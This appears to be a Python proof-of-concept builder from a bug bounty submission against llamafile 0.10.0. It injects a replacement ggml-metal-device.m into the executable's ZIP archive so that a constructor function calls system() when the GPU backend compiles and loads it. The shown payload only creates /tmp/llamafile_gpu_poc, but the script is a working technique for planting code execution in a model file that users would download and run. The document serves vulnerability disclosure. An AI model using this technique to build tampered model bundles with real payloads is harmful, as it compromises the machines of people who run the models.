File size: 2,216 Bytes
1057ee2
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/usr/bin/env python3
# llamafile GPU Source Injection PoC Builder
# Huntr Model Format Vulnerability Bounty
# Requirements: pip install gguf (for GGUF bundling); curl for downloads
# Usage: python poc_gpu_inject_builder.py
#        (expects llamafile-0.10.0 and model.gguf in the current working directory)
#
# This script builds poc_gpu_inject.llamafile demonstrating RCE via Metal GPU source injection.
# Run on macOS arm64 with llamafile-0.10.0 and --n-gpu-layers 99 to trigger.
# Observable: /tmp/llamafile_gpu_poc is created before first inference token.

import zipfile, os, subprocess, warnings
# Silence every warning category for the whole process.
# NOTE(review): presumably aimed at zipfile's duplicate-name UserWarning, raised
# when an entry is appended under a name already present in the archive —
# confirm, and consider narrowing the filter to that single warning.
warnings.filterwarnings("ignore")

# Bytes that build() stores in the archive as
# llama.cpp/ggml/src/ggml-metal/ggml-metal-device.m.
# The payload is a harmless marker: it touches /tmp/llamafile_gpu_poc and prints
# one line to stderr. The trailing stub is a placeholder, not the real Metal
# backend source. This is bounty proof-of-concept material; keep the payload
# benign.
MALICIOUS_M = b"""#include <stdlib.h>
#include <stdio.h>

// Proof-of-concept: arbitrary code runs when llamafile compiles and loads
// this file via cosmo_dlopen() during GPU backend initialisation.
__attribute__((constructor))
static void llamafile_gpu_poc(void) {
    system("touch /tmp/llamafile_gpu_poc");
    fprintf(stderr, "[POC] GPU source injection RCE via ggml-metal-device.m\n");
}

// ---- ORIGINAL ggml-metal-device.m content would follow ----
// (replace the stub below with the real source from llamafile 0.10.0
//  so the Metal dylib builds successfully and the model actually runs)
void ggml_metal_device_stub(void) {}
"""

def build(llamafile_src="llamafile-0.10.0", gguf_src="model.gguf", out="poc_gpu_inject.llamafile"):
    """Assemble the proof-of-concept llamafile from a stock binary and a GGUF model.

    Copies ``llamafile_src`` to ``out``, marks the copy executable, and appends
    three entries to the ZIP archive at its tail: the replacement Metal source
    (``MALICIOUS_M``), the model file, and a ``.args`` file that selects that
    model. Progress and follow-up instructions are printed to stdout.

    Args:
        llamafile_src: Path to the unmodified llamafile executable.
        gguf_src: Path to the GGUF model to bundle.
        out: Path of the file to create (overwritten if it exists).

    Raises:
        FileNotFoundError: If either input path does not exist. This is checked
            before ``out`` is touched so a failed run leaves no partial artifact.
    """
    import shutil

    # Validate inputs up front; previously a missing model was only noticed
    # after the output file had already been created and modified.
    for required in (llamafile_src, gguf_src):
        if not os.path.exists(required):
            raise FileNotFoundError(f"input file not found: {required}")

    shutil.copy(llamafile_src, out)
    os.chmod(out, 0o755)

    model_name = os.path.basename(gguf_src)
    args = f"-m\n/zip/{model_name}\n--n-gpu-layers\n99\n--cli\n...\n"

    # One append-mode pass adds all three entries, uncompressed (ZIP_STORED).
    with zipfile.ZipFile(out, "a", zipfile.ZIP_STORED) as zf:
        # Append the Metal source file (last-wins ZIP semantics).
        zf.writestr("llama.cpp/ggml/src/ggml-metal/ggml-metal-device.m", MALICIOUS_M)
        # ZipFile.write reads the model from disk itself rather than taking an
        # in-memory bytes copy, which matters for multi-gigabyte GGUF files.
        zf.write(gguf_src, arcname=model_name)
        zf.writestr(".args", args.encode())

    print(f"[+] Built: {out} ({os.path.getsize(out):,} bytes)")
    print(f"    Run with: ./{out}")
    print("    After launch, check: ls -la /tmp/llamafile_gpu_poc")
    print("    If the file exists: RCE via GPU source injection is confirmed.")

# Script entry point: build the PoC using build()'s default input and output
# paths. Nothing runs when the module is imported.
if __name__ == "__main__":
    build()